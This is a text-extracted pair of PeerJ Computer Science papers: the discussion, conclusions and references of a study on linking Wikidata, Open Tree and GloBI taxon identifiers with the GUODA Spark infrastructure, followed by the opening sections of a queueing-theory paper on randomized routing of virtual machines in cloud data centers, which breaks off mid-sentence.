graph is inconsistent. In this example the Procladius genus is present in Wikidata (red), Open Tree (textured fill), and GloBI (blue). The Wikidata, OTT, and GloBI taxon graphs overlap on the NCBI and the GBIF identifiers (purple and textured fill). The WoRMS identifier overlaps the OTT and Wikidata taxon graph (red and textured fill). The Procladius graph in GloBI includes NCBI identifiers with a differ- ent name string, Procladius (Holotanypus), which indicates inconsistent usage. Full-size DOI: 10.7717/peerjcs.164/fig-4 OTT ‘‘taxa’’. No inconsistent links were found between WD and GloBI. Out of the 38,000 links only found in GloBI, 9,000 were inconsistent (https://github.com/bio-guoda/guoda- datasets/blob/master/wikidata/inconsistentNameIdsGloBIOnly.tsv). The OTT, Wikidata, and GloBI identifier graphs related to this coverage analysis is a 74 MB compressed tab-separated-values file consisting of about 12 million identifier mapping records (see https://zenodo.org/record/1213477/files/links-globi-wd-ott.tsv.gz). The resulting Wikidata taxon objects were merged into GloBI’s Taxon Graph (Poelen, 2018d). Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 8/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-4 https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentNameIdsGloBIOnly.tsv https://github.com/bio-guoda/guoda-datasets/blob/master/wikidata/inconsistentNameIdsGloBIOnly.tsv https://zenodo.org/record/1213477/files/links-globi-wd-ott.tsv.gz). http://dx.doi.org/10.7717/peerj-cs.164 Figure 5 Identifier overlap between Wikidata (WD), OTT, and GloBI. This Venn Diagram shows the number of overlapping external identifiers that can be found in one of three databases. Only 207,958 ex- ternal IDs can be found in all three. These consisted of 22,637 WoRMS links, 71,980 NCBI links, 103,300 GBIF links and 10,040 IF links. Over two million IDs are only known to one of the three databases. OTT contains more than half of the external IDs in Wikidata and in GloBI, but neither contain half of the exter- nal IDs in OTT. Mapping Wikidata to GloBI matched 65.2% of the external IDs in GloBI. Full-size DOI: 10.7717/peerjcs.164/fig-5 In order for a mapping to be considered consistent, there can only be one identifier per resource included in each local graph. Thus, after removing the inconsistent identifiers, the external ID overlap can be interpreted as an estimate of the number of shared taxon names between two databases (Table 2). This cannot be interpreted as total taxa in each resource. DISCUSSION GUODA is a high performance computing resource for biodiversity science that provides scalable solutions for working with large data sets in a collaborative, online environment. The 10 min processing time for 20 GB of compressed JSON is far faster than any current mapping method used in biodiversity; however, it does benefit from the mapping already completed inside Wikidata. For example, the Wikidata entry for Panthera leo (https://www.wikidata.org/wiki/Q140) has 25 links to external databases, not all of them Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 9/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-5 https://www.wikidata.org/wiki/Q140 http://dx.doi.org/10.7717/peerj-cs.164 Table 2 Absolute and relative link counts from OTT, WD, and GloBI compared to WoRMS, GBIF, Index Fungorum (IF), and NCBI. WoRMS GBIF IF NCBI Combined OTT 327,929 (100%)* 2,451,566 (100%) 276,262 (100%) 1,355,207 (100%) 4,410,964 (100%) WD 288,110 (88%) 1,779,789 (73%) 76,497 (28%) 410,092 (30%) 2,554,488 (58%) GloBI 68,565 (21%) 315,173 (13%) 33,400 (12%) 704,361 (52%) 1,121,499 (25%) Notes. *Overlap between each resource and OTT is set at 100%. The other percentages give a relative estimate of size and scale and should not be interpreted as overlapping IDs. biodiversity-related. This linking may be based on matching name strings. Other efforts using name-string-matching to link biodiversity databases take much longer to map resources together. For instance, EOL takes more than a day to map the content it receives from providers to a unified classification (J Rice, pers. comm., 2018). Similarly, the taxon matching in BioNames and LinkOut took days to complete (R Page, pers. comm., 2018). Projects like OTT, Wikidata, and GloBI that keep identifier-based taxonomic graphs make it easier to link databases at scale. Despite the notoriously poor nature of taxon names as identifiers, they are still commonly used to link biodiversity data. A much-discussed solution has been the use of universal, unique, persistent, resolvable identifiers across the biodiversity data landscape, but the social barrier to a universal identifier system has, thus far, proven insurmountable (Nimis, 2001; Hardisty, Roberts & The Biodiversity Informatics Community, 2013). Rather than rely on name strings or a universal identifier system, this method uses the graph of identifiers to map taxa across two databases. This identifier-based method has the potential to be faster and easier than name-string matching without some of the social difficulties of a single identifier system. Most biodiversity databases and nomenclatural authorities expose their data in idiosyncratic ways that are not suitable for batch processing. If data sources published their taxon identifier graph as a lookup table (as described in this paper) integrating across databases would be much easier (Fig. 6). Now, users have to learn a unique format for every data source. These lookup tables have the advantage of being easy to version and integrate. In addition to fast linking of biodiversity databases, comparison of identifier graphs may be a scalable way to find inconsistencies, especially when multiple biodiversity databases/identifiers are included. By linking GloBI to OTT and WD, inconsistent names or false positive name matches were detected by considering the (lack of) overlap of GloBI names with OTT and WD external identifier schemes. These inconsistencies might be introduced by a dataset or a name resolution method that produces ambiguous results. In addition, inconsistencies can indicate a disputed/outdated name like ‘‘GLOBI:null@Senecio pectinatus’’ which maps to GBIF:8317096 and GBIF:8414746. This would be considered an inconsistent mapping and suggests that Senecio pectinatus is an outdated name. A related method using a variation of the PageRank algorithm (Page et al., 1999; Brin & Page, 1998) to identify the most legitimate taxonomic name to apply to a fossilized specimen (Huber & Klump, 2009) gives further legitimacy to this concept. Combining the speediness with Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 10/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.164 Figure 6 Example look up table. This figure is an excerpt from the GloBI look up table. The provided- TaxonId and the providedTaxonName come from the taxon graph external to GloBI. The resolvedTax- onId and the resolvedTaxonName are the names and identifiers that are already mapped within GloBI. Each row represents a mapping from a taxon in an external source (Pluvialis obscura) to an identifier from a source already in GloBI, which does not mint its own identifiers. Full-size DOI: 10.7717/peerjcs.164/fig-6 the promise of scalability, a near-real-time name consistency check can be implemented to detect inconsistencies across various systems in the biodiversity data-ecosystem introduced by integration bugs, taxonomy updates or differences of interpretation. GUODA has been available since 2015 and contains data dumps from GBIF, EOL TraitBank, iNaturalist, iDigBio, and BHL which are all accessible via a Jupyter notebook, web services, or Apache Spark shell on the command line. Despite its computing power and successful demonstrations at major conferences, GUODA has not been used to its full potential. The barrier of learning new programming and computing paradigms as well as developing an understanding of large dataset work flows seems to be a barrier to many in the biodiversity community. Despite this, GUODA is being used in several capacities. The Effechecka application generates taxonomic checklists using a web interface that allows a user to draw a polygon on a map and returns a deduplicated list of taxa aggregated from observation data held in GBIF, iNaturalist, etc. The EOL Freshdata project uses it to enable the detection of new occurrence records given geospatial and taxonomic and data source constraints and notifies interested users via email. Several workshops have used it to teach Spark programming skills to students at the University of Florida. Future work on the GUODA infrastructure includes training and evaluating neural network models on image data, containerization of the GUODA components to allow the system to be run in additional data centers, and refinement of the end-user interface to integrate programming, source code, and publication to make research more reproducible. GUODA’s most impactful contribution has likely been the availability of readily formatted biodiversity data and new data sets will continue to be added to the collaboration platform, enabling domain experts and technical experts to answer new questions in the future. The bottlenecks in processing for Hadoop File System and Apache Spark are the number of CPUs, amount of memory, and available storage space allocated to the computer cluster. Both HDFS and Spark are designed to scale horizontally by adding commodity servers (aka Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 11/15 https://peerj.com https://doi.org/10.7717/peerjcs.164/fig-6 http://dx.doi.org/10.7717/peerj-cs.164 nodes) to increase the processing power, working memory, and storage space. Thus, this problem is immediately solvable. Internet bandwidth to transfer the data archives from Open Tree of Life, Wikidata, and GloBI does not scale and is not something that can be addressed solely within our research group. At the moment, it takes longer to download the Wikidata resource than it does to run the linking process discussed in this manuscript. Socio-technical bottlenecks include resource-limitation and user education. Increased usage and operational support is expected to positively impact processing performance by encouraging pro-active bug fixing and infrastructure maintenance. In addition, while the technical complexity of operating and using a compute cluster have been dramatically reduced since the introduction of Hadoop in 2006, some re-education may be needed to effectively use these powerful data tools (e.g., jupyter notebooks, HDFS, scala). GUODA, and hosted data analytics infrastructure in general, has the potential to drastically improve biodiversity science by making multiple biodiversity databases accessible to scientists for analysis on their laptop or desktop. Users still need to have some programming skills, which have now become an essential skill in biodiversity science. CONCLUSIONS Sharing information between biodiversity databases can be difficult because of the amount and heterogeneity of the data and the identifiers. Most mappings are done using taxonomic name strings at great expense. We were able to map Wikidata to GloBI in 10 min using identifier graphs and GUODA, a high performance computing infrastructure developed through collaboration between diverse players. The mapping increased GloBI’s outgoing name links by 13.7%. This method of mapping across databases using identifier graphs is faster than comparing name strings and can help find inconsistencies that point to a disputed or outdated name. GUODA, and systems like it, have the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing resources that are accessible from a laptop or desktop. ACKNOWLEDGEMENTS The authors would like to acknowledge support and resources provided by the ACIS lab. The authors would like to acknowledge José A.B. Fortes for providing infrastructure and creating room for collaboration. The authors would like to thank the two reviewers for their insightful comments that greatly improved the manuscript. The Encyclopedia of Life and iDigBio helped establish an informal yet pragmatic cross-institutional collaboration. ADDITIONAL INFORMATION AND DECLARATIONS Funding Funding was provided by David Rubenstein and the Encyclopedia of Life and by iDigBio, NSF award 1547229. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 12/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.164 Grant Disclosures The following grant information was disclosed by the authors: NSF award: 1547229. Competing Interests The authors declare there are no competing interests. Author Contributions • Anne E. Thessen analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • Jorrit H. Poelen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • Matthew Collins contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper. • Jen Hammock authored or reviewed drafts of the paper, provided collaborative space and leadership. Data Availability The following information was supplied regarding data availability: Poelen, Jorrit H. (2018). Global Biotic Interactions: Taxon Graph (Version 0.3.5) [Data set]. Zenodo. http://doi.org/10.5281/zenodo.1313243. WikiData. (2018). Wikidata dump 2017-12-27 [Data set]. Zenodo. http://doi.org/10. 5281/zenodo.1211767 Poelen, Jorrit. (2018). 20 GB in 10 min: Data linking across major biodiversity databases: Data supplements (Version 0.1) [Data set]. Zenodo. Available at http: //doi.org/10.5281/zenodo.1213477 REFERENCES Bingham HC, Doudin M, Weatherdon LV, Despot-Belmonte K, Wetzel FT, Groom Q, Lewis E, Regan E, Appeltans W, Güntsch A, Mergen P, Agosti D, Penev L, Hoffmann A, Saarenmaa H, Geller G, Kim K, Kim H, Archambeau AS, Häuser C, Schmeller DS, Geijzendorffer I, García Camacho A, Guerra C, Robertson T, Runnel V, Valland N, Martin CS. 2017. The biodiversity informatics landscape: elements, connections and opportunities. RIO 3:e14059 DOI 10.3897/rio.3.e14059. Brin S, Page L. 1998. The anatomy of a large-scale hypertextual web search engine. Computer Networks and ISDN Systems 30(1–7):107–117 DOI 10.1016/S0169-7552(98)00110-X. Hardisty A, Roberts D, The Biodiversity Informatics Community. 2013. A decadal view of biodiversity informatics: challenges and priorities. BMC Ecology 13:16 DOI 10.1186/1472-6785-13-16. Hindman B, Konwinski A, Zaharia M, Ghodsi A, Josepyh AD, Katz R, Shenker S, Stoica I. 2011. Mesos: a platform for fine-grained resource sharing in the data Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 13/15 https://peerj.com http://doi.org/10.5281/zenodo.1313243 http://doi.org/10.5281/zenodo.1211767 http://doi.org/10.5281/zenodo.1211767 http://doi.org/10.5281/zenodo.1213477 http://doi.org/10.5281/zenodo.1213477 http://dx.doi.org/10.3897/rio.3.e14059 http://dx.doi.org/10.1016/S0169-7552(98)00110-X http://dx.doi.org/10.1186/1472-6785-13-16 http://dx.doi.org/10.7717/peerj-cs.164 center. In: Proceedings of the 8th USENIX conference on networked systems design and implementation. Berkeley: USENIX Association, 295–308. Hortal J, De Bello F, Diniz-Filho JAF, Lewinsohn TM, Lobo JM, Ladle RJ. 2015. Seven shortfalls that beset large-scale knowledge of biodiversity. Annual Review of Ecology, Evolution, and Systematics 46(1):523–549 DOI 10.1146/annurev-ecolsys-112414-054400. Huber R, Klump J. 2009. Charting taxonomic knowledge through ontologies and rank- ing algorithms. Computers & Geosciences 35:862–868 DOI 10.1016/j.cageo.2008.02.016. Kluyver T, Ragan-Kelley B, Pérez F, Granger B, Bussonnier M, Frederic J, Kelley K, Hamrick J, Grout J, Corlay S, Ivanov P, Avila D, Abdalla S, Willing C, Jupyter De- velopment Team. 2016. Jupyter notebooks—a publishing format for reproducible computational workflows. In: Loizides F, Schmidt B, eds. Positioning and power in academic publishing: players, agents and agendas. Amsterdam: IOS Press, 87–90. Nimis PL. 2001. A tale from Bioutopia: could a change of nomenclature bring peace to biology’s warring tribes? Nature 413(6851):21 DOI 10.1038/35092637. Page L, Brin S, Motwani R, Winograd T. 1999. The pagerank citation ranking: bringing order to the web. Technical report. Palo Alto: Stanford Digital Library Technologies Project. Page RDM. 2007. Tbmap: a taxonomic perspective on the phylogenetic database treebase. BMC Bioinformatics 8(1):158 DOI 10.1186/1471-2105-8-158. Page RDM. 2008. Biodiversity informatics: the challenge of linking data and the role of shared identifiers. Briefings in Bioinformatics 9(5):345–354 DOI 10.1093/bib/bbn022. Page RDM. 2011. Linking NCBI to Wikipedia: a wiki-based approach. PLOS Currents 3:RRN1228 DOI 10.1371/currents.RRN1228. Page RDM. 2013. BioNames: linking taxonomy, texts, and trees. PeerJ 1:e190 DOI 10.7717/peerj.190. Parr CS, Wilson N, Leary P, Schulz KS, Lans K, Walley L, Hammock JA, Goddard A, Rice J, Studer M, Holmes JTG, Corrigan Jr RJ. 2014. The encyclopedia of life v2: providing global access to knowledge about life on earth. Biodiversity Data Journal 2:e1079 DOI 10.3897/BDJ.2.e1079. Poelen J. 2018a. 20 GB in 10 min: data linking across major biodiversity databases: data supplements. Version 0.1. Zenodo DOI 10.5281/zenodo.1213477. Poelen J. 2018b. Global biotic interactions: taxon graph. Version 0.4.2. Zenodo DOI 10.5281/zenodo.1210315. Poelen J. 2018c. Global biotic interactions: taxon graph. Version 0.3.0. Zenodo DOI 10.5281/zenodo.1210308. Poelen J. 2018d. Global biotic interactions: taxon graph. Version 0.3.1. Zenodo DOI 10.5281/zenodo.1213465. Poelen JH, Simons JD, Mungall CJ. 2014. Global biotic interactions: an open infras- tructure to share and analyze species-interaction datasets. Ecological Informatics 24:148–159 DOI 10.1016/j.ecoinf.2014.08.005. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 14/15 https://peerj.com http://dx.doi.org/10.1146/annurev-ecolsys-112414-054400 http://dx.doi.org/10.1016/j.cageo.2008.02.016 http://dx.doi.org/10.1038/35092637 http://dx.doi.org/10.1186/1471-2105-8-158 http://dx.doi.org/10.1093/bib/bbn022 http://dx.doi.org/10.1371/currents.RRN1228 http://dx.doi.org/10.7717/peerj.190 http://dx.doi.org/10.3897/BDJ.2.e1079 http://dx.doi.org/10.5281/zenodo.1213477 http://dx.doi.org/10.5281/zenodo.1210315 http://dx.doi.org/10.5281/zenodo.1210308 http://dx.doi.org/10.5281/zenodo.1213465 http://dx.doi.org/10.1016/j.ecoinf.2014.08.005 http://dx.doi.org/10.7717/peerj-cs.164 Rees JA, Cranston K. 2017. Automated assembly of a reference taxonomy for phyloge- netic data synthesis. Biodiversity Data Journal 5:e12581 DOI 10.3897/BDJ.5.e12581. Shvachko K, Kuang H, Radia S, Chansler R. 2010. The Hadoop distributed file system. In: MSST’10 proceedings of the 2010 IEEE 26th symposium on mass storage systems and technologie. Piscataway: IEEE Computer Society, 1–10. Voß J. 2016. wikidata-taxonomy 0.2.7. Version 0.2.7. Zenodo DOI 10.5281/zenodo.60708. Vrandečić D, Krötzsch M. 2014. Wikidata: a free collaborative knowledgebase. Commu- nications of the ACM 57(10):78–85 DOI 10.1145/2629489. Wikidata. 2018. Wikidata dump 2017-12-27. Zenodo. DOI 10.5281/zenodo.1211767. Zaharia M, Xin RS, Wendell P, Das T, Armbrust M, Dave A, Meng X, Rosen J, Venkataraman S, Franklin MJ, Ghodsi A, Gonzalez J, Shenker S, Stoica I. 2016. Apache Spark: a unified engine for big data processing. Communications of the ACM 59(11):56–65 DOI 10.1145/2934664. Thessen et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.164 15/15 https://peerj.com http://dx.doi.org/10.3897/BDJ.5.e12581 http://dx.doi.org/10.5281/zenodo.60708 http://dx.doi.org/10.1145/2629489 http://dx.doi.org/10.5281/zenodo.1211767 http://dx.doi.org/10.1145/2934664 http://dx.doi.org/10.7717/peerj-cs.164 work_t3ov6m4zkffijleqvdqdvl3z5u ---- Randomized routing of virtual machines in IaaS data centers Randomized routing of virtual machines in IaaS data centers Hadi Khani1 and Hamed Khanmirza2 1 Department of Engineering, Islamic Azad University Garmsar Branch, Garmsar, Semnan, Iran 2 Department of Computer Engineering, K. N. Toosi University of Technology, Tehran, Tehran, Iran ABSTRACT Cloud computing technology has been a game changer in recent years. Cloud computing providers promise cost-effective and on-demand resource computing for their users. Cloud computing providers are running the workloads of users as virtual machines (VMs) in a large-scale data center consisting a few thousands physical servers. Cloud data centers face highly dynamic workloads varying over time and many short tasks that demand quick resource management decisions. These data centers are large scale and the behavior of workload is unpredictable. The incoming VM must be assigned onto the proper physical machine (PM) in order to keep a balance between power consumption and quality of service. The scale and agility of cloud computing data centers are unprecedented so the previous approaches are fruitless. We suggest an analytical model for cloud computing data centers when the number of PMs in the data center is large. In particular, we focus on the assignment of VM onto PMs regardless of their current load. For exponential VM arrival with general distribution sojourn time, the mean power consumption is calculated. Then, we show the minimum power consumption under quality of service constraint will be achieved with randomize assignment of incoming VMs onto PMs. Extensive simulation supports the validity of our analytical model. Subjects Computer Networks and Communications, Optimization Theory and Computation Keywords Optimization, Cloud computing, Placement, Energy consumption, Service level agreement, Virtualization INTRODUCTION Infrastructure-as-a-Service (IaaS) cloud providers (CPs), such as Amazon, Google and Microsoft, have huge data centers to provide on demand virtual machines (VMs) to their customers. An important issue for such data centers is to determine the server to which an incoming VM should be placed in order to optimize a given performance criterion. The CP has a variety of challenges, such as higher resource utilization, less cooling expenses and lower operation expenses. Fortunately, all of these efficiency metrics are positively correlated. Less power consumption means less operational expense, less cooling bills and higher utilization in the data center. This lets us choose the power consumption as the key metric representing others. On the other hand, cloud users who run their applications on VMs have their own concerns with quality of service. The resource management of CP has the chance to revise the initial placement of VMs onto PMs by live migrating techniques or dynamic consolidation. Considering live migration, the problem of VM placement can be divided in two parts as pictured in Fig. 1. How to cite this article Khani H, Khanmirza H. 2019. Randomized routing of virtual machines in IaaS data centers. PeerJ Comput. Sci. 5:e211 DOI 10.7717/peerj-cs.211 Submitted 10 December 2018 Accepted 10 July 2019 Published 2 September 2019 Corresponding author Hadi Khani, hkhani@ut.ac.ir Academic editor Lan Wang Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.211 Copyright 2019 Khani and Khanmirza Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.211 mailto:hkhani@�ut.�ac.�ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.211 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ 1. The routing of arriving VMs onto PMs 2. The optimization of the current VM placement by VM migration According to this scenario, a VM request transmitted by a user to the data center is routed to the proper PM in the first step and then its placement can be optimized later. The optimization of the current VM placement in the data center is analogous to the NP-hard “Bin Packing Problem.” In this problem, a given set of items of variable size should assigned to the minimum number of bins taken from a given set. The VMs experience dynamic workloads, which means that the resource usage by a VM arbitrarily varies over time. In fact, the data center resource manager does not have the complete knowledge of the future resource usage (size) of VMs. The placement of VMs is monitored continuously and is tuned through the migration procedure. The virtualization technology let VM migrates (moves) between PMs on the fly. The migration of VM can be advantageous either when the resources utilization is too low, meaning that the PM is highly underutilized, or when it is too high, possibly causing overload situations and service level agreement violations (SLAVs). The optimization problem of VM placement problem is so complex that centralized and deterministic solutions are practically useless in large data centers with hundreds or thousands of servers as shown in several researches like (Wang & Gelenbe, 2015; Shojafar, Cordeschi & Baccarelli, 2016; Wang, Jiang & Wu, 2016). The centralized and deterministic algorithms may be appropriate in data centers with a limited number of servers, but may become inefficient in large and Router VMs PM2 PM3 PM1 PM|P| ... VM migra�on VM migra�on VM migra�on λ1=r1λ λ2=r2λ λ3=r3λ λ|P|=r|P|λ λ Cloud Data Center Figure 1 Randomized router. Full-size DOI: 10.7717/peerj-cs.211/fig-1 Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 2/14 http://dx.doi.org/10.7717/peerj-cs.211/fig-1 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ very large data centers, due to the complexity of the problem and the need for the simultaneous migrations of a large number of VMs. These decentralized approaches have some side effect on routing procedure in the first part. The router does not have complete knowledge of the current placement of cloud data center. It is noteworthy that the router neither does not know about the size, the exact arriving time and sojourn time of the future VMs. These facts justify the stochastic modeling and analyzing of the router performance. In this paper, we focus on the first problem: the problem of routing arriving VM to the host. We calculate probability of SLAV as well as total power consumption in a cloud data center using tools of queueing theory. A cloud data center differs from traditional queueing systems. First, a cloud data can have a large number of PMs; traditional queueing analysis rarely consider system of this size. Second, VM sojourn time must be modeled by general distribution instead of convenient exponential distribution. These differences pose significant challenges to the analysis. We use a novel approach to respond to these challenges. Our contributions in this paper are: 1. We model the cloud data centers as a group of M/G/n/n queuing systems with single task arrivals and a task buffer of finite capacity; 2. We define a novel optimization problem to minimize the power consumption under an explicit QoS goal for any VM consolidation system; 3. We find the optimal routing policy using numerical methods. Analytical results are validated through discrete event simulation. Then, we compare our result with some benchmark algorithm for Google workload. The remainder of the paper is organized as follows. The “Related Work” section gives an overview of existing work on cloud performance evaluation and performance characterization of M/G/n/n + r queuing systems. It also introduces some heuristic algorithms for VM consolidation that we use for comparison. In the “System Model” section we discuss our analytical model in detail. We solve our optimization problem in order to obtain desired performance metrics in the “Optimization Problem” section. In the “Simulation Results” section, we present and discuss analytical as well as simulation results. We conclude the paper with the section “Conclusion” discussing the results and future research directions. RELATED WORK Prior approaches to VM placement in the literature can be broadly divided into two categories: rigorous analytical approach and heuristic algorithms. One of the first works on analysis of performance issues in VM placement has been performed by Yang et al. (2009). They obtained the distribution of response time for a cloud data center modeled as an M/M/n/n + r queueing system. They assumed both interarrival and service times are exponentially distributed, and the system has finite buffer of size n + r. The response time was broken down into waiting, service and execution periods, assuming that all three periods are independent, which is unrealistic. Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 3/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ By relaxing the assumption that the service times are not exponential, one can construct an accurate and close-to-reality model at the expense of greater complexity in the analysis. Most theoretical analyses have relied on extensive research in performance evaluation of M/G/n queuing systems (Ma & Mark, 1995; Miyazawa, 1986; Yao, 1985). However, the probability distributions of response time and queue length in M/G/n and M/G/n/n + r cannot be obtained in closed form, which necessitates the search for a suitable approximation. An approximate solution for steady-state queue length distribution in an M/G/n system with finite waiting space is described in Kimura (1996). The proposed approach is exact for M/G/n/n + r when r = 0. A similar approach for M/G/m queues is proposed in Kimura (1983). In this work, analysis is extended to compute the blocking probability and, thus, determines the smallest buffer capacity such that the rate of lost tasks remains below a predefined level. In Nozaki & Ross (1978), another approximation for the average queuing delay in an M/G/n/n + r queue was proposed. The approximation is based on the relationship of joint distribution of remaining service time to the equilibrium service distribution. Another approximation for the blocking probability is based on the exact solution for finite capacity M/M/n/n + r queues (Smith, 2003). Again, the estimate of the blocking probability is used to guide the allocation of buffers so that the blocking probability remains below a specific threshold. Most of above findings rely on some approximations. Approximations are reasonably accurate only when the number of servers is comparatively small, typically below 10 or so. In addition, approximation errors are high when the traffic intensity is small as stated in Boxma, Cohen & Huffels (1979), Kimura (1983), and Tijms, Van Hoorn & Federgruen (1981). As a result, we cannot apply the above results directly for performance analysis of CP data center when one or more of the following holds: the number of servers is very large or the distribution of service times is unknown and does not follow any of the “well-behaved” probability distributions such as exponential distribution. As we use the M/G/n/n queueing system to model a physical machine (PM) and not the whole data center, our analysis is suitable for performance analysis of cloud scale data centers. In addition, we study M/G/n/n in steady station setting. Kimura (1996) has proposed an exact closed form for queue length distribution in an M/G/n/n. In this paper, we use this closed form in defining optimization problem (Kimura, 1996) which let us apply numerical computation for analyzing the performance of the whole data center in next step. In order to compare the performance of randomized router in practice, we have chosen two algorithms from heuristic algorithms as benchmark: power aware best fit decreasing (PABFD) (Beloglazov & Buyya, 2012) and modified throttled (MT) (Domanal & Reddy, 2013). As mentioned before, the VM placement can be seen as a bin packing problem with variable bin sizes and prices, where bins represent the PMs; items are the VMs that have to be allocated; bin sizes are the available CPU capacities of the PMs; and prices correspond to the power consumption by the nodes. As the bin packing problem is NP-hard, to solve it Beloglazov & Buyya (2012) apply a modification of the best fit decreasing algorithm Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 4/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ that is shown to use no more than 119 OPT þ 1 bins (where OPT is the number of bins provided by the optimal solution) (Yue, 1991). In PABFD, they sort all the VMs in the decreasing order of their current CPU utilizations and allocate each VM to a host that provides the least increase of the power consumption caused by the allocation. In each round of PABFD all VMs are placed again. The number of VM migrations skyrockets in PABFD and it is not practical in a real large-scale data center. Modified throttled algorithm maintains an index table of PMs and also the state of PMs (Domanal & Reddy, 2013). There has been an attempt made to improve the response time and achieve efficient usage of available PMs. Proposed algorithm employs a method for selecting a machine for hosting arriving VM of user where, machine at first index is initially selected depending upon the state of the machine. If the machine is available, it is assigned with the request and id of machine is returned to data center resource manager, else -1 is returned. When the next request arrives, the machine at the index next to already assigned machine is chosen depending on the state of machine and follows the above step. This method needs to keep an updated index table of state of machines. In large data centers this task is not trivial, in particular when you taking into account the decentralized consolidation of VMs. It is important that both MT and PABFD is not practical in real scenario, and here we use them just as idealistic benchmark algorithms. SYSTEM MODEL Consider a IaaS data center consisting of a set of |P| PMs. Let P = {1,2,...,|P|} denote index set of the set of PMs. Users request VMs to the provider. New request is either admitted or rejected in the admission control phase. An admitted request moves to the placement phase, where it will be assigned to one of PMs (Carvalho, Menasce & Brasileiro, 2015). We suggest a randomized router after the admission. The router sends incoming VMs to PM i with probability ri, for all i ∈ P. The vector~r ¼ fr1; r2; . . . ; rjPjg is a probability vector and satisfies P i2P ri ¼ 1. VMs have independent and identically distributed service (sojourn) time with mean 1/m. In addition, these sojourn times are independent of the host load. Assume that the utilization demand of all VMs is equal to one. Extensive analysis of huge data centers shows that majority of the VMs have approximately the same utilization (Reiss, Wilkes & Hellerstein, 2011). This observation supports our assumption. Assume that each PM only hosts at most n VMs. In the case a VM is assigned to an already full PM, the PM is overloaded. An overloaded PM degrades the QoS of the end user and we can assume this event as an SLAV (Domanal & Reddy, 2013; Beloglazov & Buyya, 2012). It should be remembered that the router is after admission control and admitted VMs could not be queued. All VMs arrive at the data center according to Poisson process with rate l, thereby VMs arrive at PM i according to Poisson process with rate li = l ri, for all i ∈ P (Wang, Chang & Liu, 2015). These processes are independent (see Section 6.4 in Trivedi (2001)). The whole data center can be modeled as a group of independent M/G/n/n (also known as generalized Erlang loss system) systems that work in parallel. Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 5/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ Generalized Erlang loss system It is well known that for an M/G/n/n system, the steady-state distribution exists and is given by the “product form” as below (Kelly, 1991; Kimura, 1983). pk ¼ p0 � l � �k 1 k! ; for k � n 0; for k > n 8< : (1) where pk denotes the steady-state probability that there are k VMs in an M/G/n/n system, that is pk ¼ limt!1 pkðtÞ, and the steady-state probability that M/G/n/n is empty (p0) is given by p0 ¼ Xn k¼0 � m � �k 1 k! " #�1 (2) Specifically, pn describes the fraction of time that the PM is fully utilized. We call this probability SLAV and it is given by pn ¼ ð�=mÞn n!Xn k¼0 ð�=mÞk k! (3) Power consumption We are interested in minimizing the total power consumption of the data center. According to the results of the standard experiments stated in (spec.org, 2018) (Fig. 2), the instantaneous power consumption of PM i is a function of utilization level of that PM (k) as below Wi ¼ a þ bk; for k . 0 ð4Þ0; for k ¼ 0 ð5Þ � 0 0.2 0.4 0.6 0.8 1 0 10 20 30 40 50 60 70 80 90 100 Utilization (Load) P o w e r (W a tt ) Active Idle Full Load Figure 2 Linear power consumption. Full-size DOI: 10.7717/peerj-cs.211/fig-2 Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 6/14 http://dx.doi.org/10.7717/peerj-cs.211/fig-2 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ where 0 � k � 100 is integer variable and both a and b are fixed values. In our model, k can be seen as the number of VMs in PM i. Then the expected steady state of power consumption will be Exp½Wi� ¼ X100 k¼1 Wi;kpi;k (6) ¼ að1 � pi;0Þ þ b X100 k¼1 kpi;k (7) where pi,k denotes the steady-state probability that the utilization of PM i is k and can be calculated by Eq. (1) for n = 100. Note that Exp[Wi] = 0 if and only if li = 0 (pi,0 = 1). Our objective is to determine the vector r! that minimizes the total expected steady-state power consumption of the data center, that is, min ~r X i2P Exp½Wi� (8) SLA constraint We are interested in keeping the probability of SLAV below a given value ε. SLAV happens when a PM i does not have sufficient capacity for a new arriving VM (when M/G/100/100 is in state 100). The SLAV constraint is PrðSLAVÞ ¼ pi;100 � e 8i 2 P (9) where pi,100 denotes the steady-state blocking probability for PM i. OPTIMIZATION PROBLEM In this section, we consider the optimization problem, in which the router decides where each incoming VM will be sent, so as to minimize the total expected power consumption subject to the SLA constraints. The 